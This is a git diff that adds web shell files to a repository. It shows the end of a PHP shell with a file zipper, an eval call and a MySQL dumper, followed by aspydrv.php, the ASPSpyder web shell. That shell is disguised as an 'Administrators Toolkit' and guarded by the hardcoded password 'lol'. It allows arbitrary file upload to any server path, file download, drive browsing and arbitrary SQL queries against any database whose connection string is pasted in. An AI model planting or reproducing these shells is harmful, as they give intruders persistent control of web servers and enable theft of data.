+				foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
+			}
+			if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
+			else chdir($curdir);
+			if (count($filelist)>0){
+				foreach($filelist as $filename){
+					if (is_file($filename)){
+						$fd = fopen ($filename, 'r');
+						$content = @fread ($fd, filesize($filename));
+						fclose ($fd);
+						if (is_array($dir)) $filename = basename($filename);
+						$this -> addFile($content, $filename);
+					}
+				}
+				$this->out = $this -> file();
+				chdir($curdir);
+			}
+			return 1;
+		}
+		else return 0;
+	}
+
+	// +&#1105;||++|&#1080;-+-++-+ --#&#1101;
+	function GetFileList($dir){
+		static $a;
+		if (is_dir($dir)) {
+			if ($dh = opendir($dir)) {
+				while ($file = readdir($dh)) {
+					if($file!='.' && $file!='..'){
+						$f=$dir .'/'. $file;
+						if(is_dir($f)) $this->GetFileList($f);
+						$a[]=$f;
+					}
+				}
+				closedir($dh);
+			}
+		}
+		return $a;
+	}
+
+	var $datasec      = array();
+	var $ctrl_dir     = array();
+	var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+	var $old_offset   = 0;
+
+	function unix2DosTime($unixtime = 0) {
+		$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+		if ($timearray['year'] < 1980) {
+			$timearray['year']    = 1980;
+			$timearray['mon']     = 1;
+			$timearray['mday']    = 1;
+			$timearray['hours']   = 0;
+			$timearray['minutes'] = 0;
+			$timearray['seconds'] = 0;
+		} // end if
+		return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+				($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+	}
+
+	function addFile($data, $name, $time = 0) {
+		$name = str_replace('\\', '/', $name);
+
+		$dtime = dechex($this->unix2DosTime($time));
+		$hexdtime	= '\x' . $dtime[6] . $dtime[7]
+					. '\x' . $dtime[4] . $dtime[5]
+					. '\x' . $dtime[2] . $dtime[3]
+					. '\x' . $dtime[0] . $dtime[1];
+		eval('$hexdtime = "' . $hexdtime . '";');
+		$fr	= "\x50\x4b\x03\x04";
+		$fr	.= "\x14\x00";
+		$fr	.= "\x00\x00";
+		$fr	.= "\x08\x00";
+		$fr	.= $hexdtime;
+
+		$unc_len = strlen($data);
+		$crc = crc32($data);
+		$zdata = gzcompress($data);
+		$c_len = strlen($zdata);
+		$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+		$fr .= pack('V', $crc);
+		$fr .= pack('V', $c_len);
+		$fr .= pack('V', $unc_len);
+		$fr .= pack('v', strlen($name));
+		$fr .= pack('v', 0);
+		$fr .= $name;
+		$fr .= $zdata;
+		$fr .= pack('V', $crc);
+		$fr .= pack('V', $c_len);
+		$fr .= pack('V', $unc_len);
+
+		$this -> datasec[] = $fr;
+		$new_offset = strlen(implode('', $this->datasec));
+
+		$cdrec = "\x50\x4b\x01\x02";
+		$cdrec .= "\x00\x00";
+		$cdrec .= "\x14\x00";
+		$cdrec .= "\x00\x00";
+		$cdrec .= "\x08\x00";
+		$cdrec .= $hexdtime;
+		$cdrec .= pack('V', $crc);
+		$cdrec .= pack('V', $c_len);
+		$cdrec .= pack('V', $unc_len);
+		$cdrec .= pack('v', strlen($name) );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('V', 32 );
+		$cdrec .= pack('V', $this -> old_offset );
+		$this -> old_offset = $new_offset;
+		$cdrec .= $name;
+
+		$this -> ctrl_dir[] = $cdrec;
+	}
+
+	function file() {
+		$data    = implode('', $this -> datasec);
+		$ctrldir = implode('', $this -> ctrl_dir);
+		return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) .	pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
+	}
+}
+
+// #++|- +|+&#1090;
+function sqldumptable($table, $fp=0) {
+	$tabledump = "DROP TABLE IF EXISTS $table;\n";
+	$tabledump .= "CREATE TABLE $table (\n";
+
+	$firstfield=1;
+
+	$fields = q("SHOW FIELDS FROM $table");
+	while ($field = mysql_fetch_array($fields)) {
+		if (!$firstfield) {
+			$tabledump .= ",\n";
+		} else {
+			$firstfield=0;
+		}
+		$tabledump .= "   $field[Field] $field[Type]";
+		if (!empty($field["Default"])) {
+			$tabledump .= " DEFAULT '$field[Default]'";
+		}
+		if ($field['Null'] != "YES") {
+			$tabledump .= " NOT NULL";
+		}
+		if ($field['Extra'] != "") {
+			$tabledump .= " $field[Extra]";
+		}
+	}
+	fr($fields);
+
+	$keys = q("SHOW KEYS FROM $table");
+	while ($key = mysql_fetch_array($keys)) {
+		$kname=$key['Key_name'];
+		if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
+			$kname="UNIQUE|$kname";
+		}
+		if(!is_array($index[$kname])) {
+			$index[$kname] = array();
+		}
+		$index[$kname][] = $key['Column_name'];
+	}
+	fr($keys);
+
+	while(list($kname, $columns) = @each($index)) {
+		$tabledump .= ",\n";
+		$colnames=implode($columns,",");
+
+		if ($kname == "PRIMARY") {
+			$tabledump .= "   PRIMARY KEY ($colnames)";
+		} else {
+			if (substr($kname,0,6) == "UNIQUE") {
+				$kname=substr($kname,7);
+			}
+			$tabledump .= "   KEY $kname ($colnames)";
+		}
+	}
+
+	$tabledump .= "\n);\n\n";
+	if ($fp) {
+		fwrite($fp,$tabledump);
+	} else {
+		echo $tabledump;
+	}
+
+	$rows = q("SELECT * FROM $table");
+	$numfields = mysql_num_fields($rows);
+	while ($row = mysql_fetch_array($rows)) {
+		$tabledump = "INSERT INTO $table VALUES(";
+
+		$fieldcounter=-1;
+		$firstfield=1;
+		while (++$fieldcounter<$numfields) {
+			if (!$firstfield) {
+				$tabledump.=", ";
+			} else {
+				$firstfield=0;
+			}
+
+			if (!isset($row[$fieldcounter])) {
+				$tabledump .= "NULL";
+			} else {
+				$tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
+			}
+		}
+
+		$tabledump .= ");\n";
+
+		if ($fp) {
+			fwrite($fp,$tabledump);
+		} else {
+			echo $tabledump;
+		}
+	}
+	fr($rows);
+	if ($fp) {
+		fwrite($fp,"\n");
+	} else {
+		echo "\n";
+	}
+}
+
+function ue($str){
+	return urlencode($str);
+}
+
+function p($str){
+	echo $str."\n";
+}
+
+function tbhead() {
+	p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
+}
+function tbfoot(){
+	p('</table>');
+}
+
+function makehide($name,$value=''){
+	p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
+}
+
+function makeinput($arg = array()){
+	$arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
+	$arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
+	!$arg['type'] && $arg['type'] = 'text';
+	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+	$arg['class'] = $arg['class'] ? $arg['class'] : 'input';
+	if ($arg['newline']) {
+		p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
+	} else {
+		p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
+	}
+}
+
+function makeselect($arg = array()){
+	if ($arg['onchange']) {
+		$onchange = 'onchange="'.$arg['onchange'].'"';
+	}
+	$arg['title'] = $arg['title'] ? $arg['title'] : '';
+	if ($arg['newline']) p('<p>');
+	p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
+		if (is_array($arg['option'])) {
+			foreach ($arg['option'] as $key=>$value) {
+				if ($arg['selected']==$key) {
+					p("<option value=\"$key\" selected>$value</option>");
+				} else {
+					p("<option value=\"$key\">$value</option>");
+				}
+			}
+		}
+	p("</select>");
+	if ($arg['newline']) p('</p>');
+}
+function formhead($arg = array()) {
+	!$arg['method'] && $arg['method'] = 'post';
+	!$arg['action'] && $arg['action'] = $self;
+	$arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
+	!$arg['name'] && $arg['name'] = 'form1';
+	p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
+	if ($arg['title']) {
+		p('<h2>'.$arg['title'].' &raquo;</h2>');
+	}
+}
+
+function maketext($arg = array()){
+	!$arg['cols'] && $arg['cols'] = 100;
+	!$arg['rows'] && $arg['rows'] = 25;
+	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+	p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
+}
+
+function formfooter($name = ''){
+	!$name && $name = 'submit';
+	p('<p><input class="bt" name="'.$name.'" id=\"'.$name.'\" type="submit" value="Submit"></p>');
+	p('</form>');
+}
+
+function formfoot(){
+	p('</form>');
+}
+
+// |&#1118;-+|&#1087;- 
+function pr($a) {
+	echo '<pre>';
+	print_r($a);
+	echo '</pre>';
+}
+
+?>
diff --git a/php/aspydrv.php b/php/aspydrv.php
new file mode 100644
index 0000000..218d4c1
--- /dev/null
+++ b/php/aspydrv.php
@@ -0,0 +1,828 @@
+<%
+Function BufferContent(data)
+	Dim strContent(64)
+	Dim i
+	ClearString strContent
+	For i = 1 To LenB(data)
+		AddString strContent,Chr(AscB(MidB(data,i,1)))
+	Next
+	BufferContent = fnReadString(strContent)
+End Function
+
+Sub ClearString(part)
+	Dim index
+	For index = 0 to 64
+		part(index)=""
+	Next
+End Sub
+
+Sub AddString(part,newString)
+	Dim tmp
+	Dim index
+	part(0) = part(0) & newString
+	If Len(part(0)) > 64 Then
+		index=0
+		tmp=""
+		Do
+			tmp=part(index) & tmp
+			part(index) = ""
+			index = index + 1
+		Loop until part(index) = ""
+		part(index) = tmp
+	End If
+End Sub
+
+Function fnReadString(part)
+	Dim tmp
+	Dim index
+	tmp = ""
+	For index = 0 to 64
+		If part(index) <> "" Then
+			tmp = part(index) & tmp
+		End If
+	Next
+	FnReadString = tmp
+End Function
+
+
+Class FileUploader
+	Public  Files
+	Private mcolFormElem
+	Private Sub Class_Initialize()
+		Set Files = Server.CreateObject("Scripting.Dictionary")
+		Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
+	End Sub
+
+	Private Sub Class_Terminate()
+		If IsObject(Files) Then
+			Files.RemoveAll()
+			Set Files = Nothing
+		End If
+		If IsObject(mcolFormElem) Then
+			mcolFormElem.RemoveAll()
+			Set mcolFormElem = Nothing
+		End If
+	End Sub
+
+	Public Property Get Form(sIndex)
+		Form = ""
+		If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
+	End Property
+
+	Public Default Sub Upload()
+		Dim biData, sInputName
+		Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
+		Dim nPosFile, nPosBound
+		biData = Request.BinaryRead(Request.TotalBytes)
+		nPosBegin = 1
+		nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
+		If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
+		vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
+		nDataBoundPos = InstrB(1, biData, vDataBounds)
+		Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
+			nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
+			nPos = InstrB(nPos, biData, CByteString("name="))
+			nPosBegin = nPos + 6
+			nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
+			sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+			nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
+			nPosBound = InstrB(nPosEnd, biData, vDataBounds)
+			If nPosFile <> 0 And  nPosFile < nPosBound Then
+				Dim oUploadFile, sFileName
+				Set oUploadFile = New UploadedFile
+				nPosBegin = nPosFile + 10
+				nPosEnd =  InstrB(nPosBegin, biData, CByteString(Chr(34)))
+				sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+				oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
+				nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
+				nPosBegin = nPos + 14
+				nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
+				oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+				nPosBegin = nPosEnd+4
+				nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
+				oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
+				If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
+			Else
+				nPos = InstrB(nPos, biData, CByteString(Chr(13)))
+				nPosBegin = nPos + 4
+				nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
+				If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+			End If
+			nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
+		Loop
+	End Sub
+
+	'String to byte string conversion
+	Private Function CByteString(sString)
+		Dim nIndex
+		For nIndex = 1 to Len(sString)
+		   CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
+		Next
+	End Function
+
+	'Byte string to string conversion
+	Private Function CWideString(bsString)
+		Dim nIndex
+		CWideString =""
+		For nIndex = 1 to LenB(bsString)
+		   CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1))) 
+		Next
+	End Function
+End Class
+
+
+Class UploadedFile
+	Public ContentType
+	Public FileName
+	Public FileData
+	Public Property Get FileSize()
+		FileSize = LenB(FileData)
+	End Property
+
+	Public Sub SaveToDisk(sPath)
+		Dim oFS, oFile
+		Dim nIndex
+		If sPath = "" Or FileName = "" Then Exit Sub
+		If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
+		Set oFS = Server.CreateObject("Scripting.FileSystemObject")
+		If Not oFS.FolderExists(sPath) Then Exit Sub
+		Set oFile = oFS.CreateTextFile(sPath & FileName, True)
+		' output mechanism modified for buffering
+		oFile.Write BufferContent(FileData)
+		oFile.Close
+	End Sub
+
+	Public Sub SaveToDatabase(ByRef oField)
+		If LenB(FileData) = 0 Then Exit Sub
+		If IsObject(oField) Then
+			oField.AppendChunk FileData
+		End If
+	End Sub
+End Class
+
+' Create the FileUploader
+IF REQUEST.QueryString("upload")="@" THEN
+Dim Uploader, File
+Set Uploader = New FileUploader
+
+' This starts the upload process
+Uploader.Upload()
+
+%>
+<html><title>ASPYDrvsInfo</title>
+<style>
+<!--
+A:link {font-style: text-decoration: none; color: #c8c8c8}
+A:visited {font-style: text-decoration: none; color: #777777}
+A:active {font-style: text-decoration: none; color: #ff8300}
+A:hover {font-style: text-decoration: cursor: hand; color: #ff8300}
+*		{scrollbar-base-color:#777777;
+scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-face-color:#505050;
+scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight-color:#303030;}
+input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:none;border:1px solid #000000;}
+//-->
+</style>
+<body bgcolor=black text=white>
+<BR><BR><BR>
+<center><table bgcolor="#505050" cellpadding=4>
+<tr><td><Font face=arial size=-1>File upload Information:</font>
+</td></tr><tr><td bgcolor=black ><table>
+<%
+
+' Check if any files were uploaded
+If Uploader.Files.Count = 0 Then
+	Response.Write "File(s) not uploaded."
+Else
+	' Loop through the uploaded files
+	For Each File In Uploader.Files.Items
+		File.SaveToDisk Request.QueryString("txtpath")
+		Response.Write "<TR><TD>&nbsp;</TD></TR><tr><td><font color=gray>File Uploaded: </font></td><td>" & File.FileName & "</td></tr>"
+		Response.Write "<tr><td><font color=gray>Size: </font></td><td>" & Int(File.FileSize/1024)+1 & " kb</td></tr>"
+		Response.Write "<tr><td><font color=gray>Type: </font></td><td>" & File.ContentType & "</td></tr>"
+	Next
+End If
+%>
+<TR><TD>&nbsp;</TD></TR></table>
+</td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=Request.QueryString("txtpath")%>"><font face="webdings" title=" BACK " size=+2 >7</font></a></center>
+<%
+response.End() '---- XXX
+END IF
+'--------
+ON ERROR RESUME NEXT
+Response.Buffer = True
+password = "lol" ' <---Your password here
+
+If request.querystring("logoff")="@" then
+	session("shagman")=""	' Logged off
+	session("dbcon")=""		' Database Connection
+	session("txtpath")=""	' any pathinfo
+end if
+
+	If (session("shagman")<>password) and Request.form("code")="" Then
+		%>
+<body bgcolor=black><center><BR><BR><BR><BR><FONT face=arial size=-2 color=#ff8300>ADMINSTRATORS TOOLKIT</FONT><BR><BR><BR>
+<table><tr><td>
+<FORM method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" >
+<table bgcolor=#505050 width="20%" cellpadding=20 ><tr><td bgcolor=#303030 align=center >
+<INPUT type=password name=code ></td><td><INPUT name=submit type=submit value=" Access ">
+</td></tr></table>
+</td></tr><tr><td align=right>
+<font color=white size=-2 face=arial >ASPSpyder Apr2003</font></td></tr>
+</td></tr></table></FORM>
+<%If request.querystring("logoff")="@" then%>
+<font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='cursor: hand;' OnClick=window.close(this);>CLOSE THIS WINDOW</font>
+<%end if%>
+<center>
+		<%
+		Response.END
+	End If
+	If Request.form("code") = password or session("shagman") = password Then
+		session("shagman") = password
+	Else
+		Response.Write "<BR><B><P align=center><font color=red ><b>ACCESS DENIED</B></font><BR><font color=Gray >Copyright 2003 Vela iNC.</font></p>"
+		Response.END
+	End If
+
+server.scriptTimeout=180
+set fso = Server.CreateObject("Scripting.FileSystemObject")
+mapPath = Server.mappath(Request.Servervariables("SCRIPT_NAME"))
+mapPathLen = len(mapPath)
+
+if session(myScriptName) = "" then
+	for x = mapPathLen to 0 step -1
+	myScriptName = mid(mapPath,x)
+	if instr(1,myScriptName,"\")>0 then
+		myScriptName = mid(mapPath,x+1)
+		x=0
+		session(myScriptName) = myScriptName
+	end if
+	next
+Else
+	myScriptName = session(myScriptName)
+end if
+
+
+wwwRoot = left(mapPath, mapPathLen - len(myScriptName))
+Target = "D:\hshome\masterhr\masterhr.com\"  ' ---Directory to which files will be DUMPED Too and From
+
+	if len(Request.querystring("txtpath"))=3 then
+		pathname = left(Request.querystring("txtpath"),2) & "\" & Request.form("Fname")
+	else
+		pathname = Request.querystring("txtpath") & "\" & Request.form("Fname")
+	end if
+
+	If Request.Form("txtpath") = "" Then
+	MyPath = Request.QueryString("txtpath")
+	Else
+	MyPath = Request.Form("txtpath")
+	End If
+
+' ---Path correction routine
+	If len(MyPath)=1 then MyPath=MyPath & ":\"
+	If len(MyPath)=2 then MyPath=MyPath & "\"
+	If MyPath = "" Then MyPath = wwwRoot
+	If not fso.FolderExists(MyPath) then
+	Response.Write "<font face=arial size=+2>Non-existing path specified.<BR>Please use browser back button to continue !"
+	Response.end
+	end if
+
+	set folder = fso.GetFolder(MyPath)
+
+if fso.GetFolder(Target) = false then
+	Response.Write "<font face=arial size=-2 color=red>Please create your target directory for copying files as it does not exist. </font><font face=arial size=-1 color=red>" & Target & "<BR></font>"
+else
+	set fileCopy = fso.GetFolder(Target)
+end if
+
+
+	If Not(folder.IsRootFolder) Then
+		If len(folder.ParentFolder)>3 then
+			showPath = folder.ParentFolder & "\" & folder.name
+		Else
+			showPath = folder.ParentFolder & folder.name
+		End If
+	Else
+		showPath = left(MyPath,2)
+	End If
+
+MyPath=showPath
+showPath=MyPath & "\"
+' ---Path correction routine-DONE
+
+set drv=fso.GetDrive(left(MyPath,2))
+
+if Request.Form("cmd")="Download" then
+ if Request.Form("Fname")<>"" then
+	Response.Buffer = True
+	Response.Clear
+	strFileName = Request.QueryString("txtpath") & "\" & Request.Form("Fname")
+	Set Sys = Server.CreateObject( "Scripting.FileSystemObject" )
+	Set Bin = Sys.OpenTextFile( strFileName, 1, False )
+	Call Response.AddHeader( "Content-Disposition", "attachment; filename=" & Request.Form("Fname") )
+	Response.ContentType = "application/octet-stream"
+	While Not Bin.AtEndOfStream
+		Response.BinaryWrite( ChrB( Asc( Bin.Read( 1 ) ) ) )
+	Wend
+	Bin.Close : Set Bin = Nothing
+	Set Sys = Nothing
+ Else
+ 	err.number=500
+	err.description="Nothing selected for download..."
+ End if
+End if
+%>
+<html>
+<style>
+<!--
+A:link {font-style: text-decoration: none; color: #c8c8c8}
+A:visited {font-style: text-decoration: none; color: #777777}
+A:active {font-style: text-decoration: none; color: #ff8300}
+A:hover {font-style: text-decoration: cursor: hand; color: #ff8300}
+*		{scrollbar-base-color:#777777;
+scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-face-color:#505050;
+scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight-color:#303030;}
+input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:none;border:1px solid #000000;}
+//-->
+</style>
+<%
+'QUERY ANALYSER -- START
+if request.QueryString("qa")="@" then
+'-------------
+sub getTable(mySQL)
+		if mySQL="" then
+			exit sub
+		end if
+	on error resume next
+	Response.Buffer = True
+    	Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFlag
+		myConnectionString=session("dbCon")
+    	Set myDBConnection = Server.CreateObject("ADODB.Connection")
+    	myDBConnection.Open myConnectionString
+		myFlag = False
+		myFlag = errChk()
+        	set rs = Server.CreateObject("ADODB.Recordset")
+			rs.cursorlocation = 3
+	    	rs.open mySQL, myDBConnection
+			myFlag = errChk()
+
+	if RS.properties("Asynchronous Rowset Processing") = 16 then
+        	For i = 0 To rs.Fields.Count - 1
+    			myFields = myFields & "<TD><font color=#eeeeee size=2 face=""Verdana, Arial, Helvetica, sans-serif"">" & rs.Fields(i).Name & "</font></TD>"
+    		Next
+			myTitle = "<font color=gray size=6 face=webdings>?</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(" & rs.RecordCount & " row(s) affected)</TT><br>"
+		rs.MoveFirst
+		rs.PageSize=mNR
+		if int(rs.RecordCount/mNR) < mPage then mPage=1
+        rs.AbsolutePage = mPage
+		Response.Write myTitle & "</td><td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"
+if mPage=1 Then Response.Write("<input type=button name=btnPagePrev value=""  <<  "" DISABLED>") else Response.Write("<input type=button name=btnPagePrev value=""  <<  "">")
+Response.Write "<select name=cmbPageSelect>"
+For x = 1 to rs.PageCount
+	if x=mPage Then Response.Write("<option value=" & x & " SELECTED>" & x & "</option>") else Response.Write("<option value=" & x & ">" & x & "</option>")
+Next
+Response.Write "</select><input type=hidden name=mPage value=" & mPage & ">"
+if mPage = rs.PageCount Then Response.Write("<input type=button name=btnPageNext value=""  >>  "" DISABLED>") else Response.Write("<input type=button name=btnPageNext value=""  >>  "">")
+Response.Write "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray>Displaying <input type=text size=" & Len(mNR) & " name=txtNoRecords value=" & mNR & "> records at a time.</font>"
+		response.Write "</td><TABLE border=0 bgcolor=#999999 cellpadding=2><TR align=center valign=middle bgcolor=#777777>" & myFields
+
+        For x = 1 to rs.PageSize
+          If Not rs.EOF Then
+			response.Write "<TR>"
+			For i = 0 to rs.Fields.Count - 1
+				response.Write "<TD bgcolor=#dddddd>" & server.HTMLEncode(rs(i)) & "</TD>"
+			Next
+			response.Write "</TR>"
+			response.Flush()
+			rs.MoveNext
+		  Else
+		  	x=rs.PageSize
+		  End If
+		Next
+		response.Write "</Table>"
+		myFlag = errChk()
+
+	else
+		if not myFlag then
+			myTitle = "<font color=#55ff55 size=6 face=webdings>i</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(The command(s) completed successfully.)</TT><br>"
+			response.Write myTitle
+		end if
+	end if
+		set myDBConnection = nothing
+		set rs2 = nothing
+		set rs = nothing
+    
+End sub
+
+sub getXML(mySQL)
+		if mySQL="" then
+			exit sub
+		end if
+	on error resume next
+	Response.Buffer = True
+    	Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFlag
+		myConnectionString=session("dbCon")
+    	Set myDBConnection = Server.CreateObject("ADODB.Connection")
+    	myDBConnection.Open myConnectionString
+		myFlag = False
+		myFlag = errChk()
+        	set rs = Server.CreateObject("ADODB.Recordset")
+			rs.cursorlocation = 3
+	    	rs.open mySQL, myDBConnection
+			myFlag = errChk()
+	if RS.properties("Asynchronous Rowset Processing") = 16 then
+		Response.Write "<font color=#55ff55 size=4 face=webdings>i</font><font color=#cccccc> Copy paste this code and save as '.xml '</font></td></tr><tr><td>"
+		Response.Write "<textarea cols=75 name=txtXML rows=15>"
+		rs.MoveFirst
+		response.Write vbcrlf & "<?xml version=""1.0"" ?>"
+		response.Write vbcrlf & "<TableXML>"
+		Do While Not rs.EOF
+			response.Write vbcrlf & "<Column>"
+			For i = 0 to rs.Fields.Count - 1
+				response.Write  vbcrlf & "<" & rs.Fields(i).Name & ">"  & rs(i) & "</" & rs.Fields(i).Name & ">" & vbcrlf
+				response.Flush()
+			Next
+			response.Write "</Column>"
+		rs.MoveNext
+		Loop
+		response.Write "</TableXML>"
+		response.Write "</textarea>"	
+		myFlag = errChk()
+
+	else
+		if not myFlag then
+			myTitle = "<font color=#55ff55 size=6 face=webdings>i</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(The command(s) completed successfully.)</TT><br>"
+			response.Write myTitle
+		end if
+	end if
+End sub
+
+Function errChk()
+	if err.Number <> 0 and err.Number <> 13 then
+		dim myText
+		myText = "<font color=#ff8300 size=4 face=webdings>x</font><font color=red size=2 face=""Verdana, Arial, Helvetica, sans-serif""> " & err.Description & "</font><BR>"
+		response.Write myText
+		err.Number = 0
+		errChk = True
+	end if
+end Function
+
+    Dim myQuery,mPage,mNR
+	myQuery = request.Form("txtSQL")
+	if request.form("txtCon") <> "" then session("dbcon") = request.form("txtCon")
+	if request.QueryString("txtpath") then session("txtpath")=request.QueryString("txtpath")
+	mPage=cint(request.Form("mPage"))
+	if mPage<1 then mPage=1
+	mNR=cint(request.Form("txtNoRecords"))
+	if mNR<1 then mNR=30
+%>
+<html><title>ASPyQAnalyser</title>
+<script language="VbScript">
+sub cmdSubmit_onclick
+	if Document.frmSQL.txtSQL.value = "" then
+		Document.frmSQL.txtSQL.value = "SELECT * FROM " & vbcrlf & "WHERE " & vbcrlf & "ORDER BY "
+		exit sub
+	end if
+	Document.frmSQL.Submit
+end sub
+sub cmdTables_onclick
+	Document.frmSQL.txtSQL.value = "select name as 'TablesListed' from sysobjects where xtype='U' order by name"
+	Document.frmSQL.Submit
+end sub
+sub cmdColumns_onclick
+	strTable =InputBox("Return Columns for which Table?","Table Name...")
+	strTable = Trim(strTable)
+	if len(strTable) > 0 Then
+		SQL = "select name As 'ColumnName',xusertype As 'DataType',length as Length from syscolumns where id=(select id from sysobjects where xtype='U' and name='" & strTable & "') order by name"
+		Document.frmSQL.txtSQL.value = SQL
+		Document.frmSQL.Submit	
+	End if
+end sub
+sub cmdClear_onclick
+	Document.frmSQL.txtSQL.value = ""
+end sub
+sub cmdBack_onclick
+	Document.Location = "<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=session("txtpath")%>"
+end sub
+Sub btnPagePrev_OnClick
+	Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1
+	Document.frmSQL.Submit
+end sub
+Sub btnPageNext_OnClick
+	Document.frmSQL.mPage.value = Document.frmSQL.mPage.value + 1
+	Document.frmSQL.Submit
+end sub
+Sub cmbPageSelect_onchange
+	Document.frmSQL.mPage.value = (Document.frmSQL.cmbPageSelect.selectedIndex + 1)
+	Document.frmSQL.Submit
+End Sub
+Sub txtNoRecords_onclick
+	Document.frmSQL.cmbPageSelect.selectedIndex = 0
+	Document.frmSQL.mPage.value = 1
+End Sub
+</script>
+<style>
+	TR {font-family: sans-serif;}
+</style>
+<body bgcolor=black>
+<form name=frmSQL action="<%=Request.Servervariables("SCRIPT_NAME")%>?qa=@" method=Post>
+<table border="0"><tr>
+      <td align=right><font color=#ff8300 size="4" face="webdings">@ </font><font color="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">Paste 
+        your connection string here : </font><font color="#CCCCCC"> 
+        <input name=txtCon type="text" size="60" value="<%=session("dbcon")%>">
+        </font><BR>
+        <textarea cols=75 name=txtSQL rows=4 wrap=PHYSICAL><%=myQuery%></textarea><BR>
+        <input name=cmdSubmit type=button value=Submit><input name=cmdTables type=button value=Tables><input name=cmdColumns type=button value=Columns><input name="reset" type=reset value=Reset><input name=cmdClear type=button value=Clear><input name=cmdBack type=button value="Return"><input type="Checkbox" name="chkXML" <%IF Request.Form("chkXML")= "on" tHEN Response.Write " checked " %>><font color="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">GenerateXML</FONT>
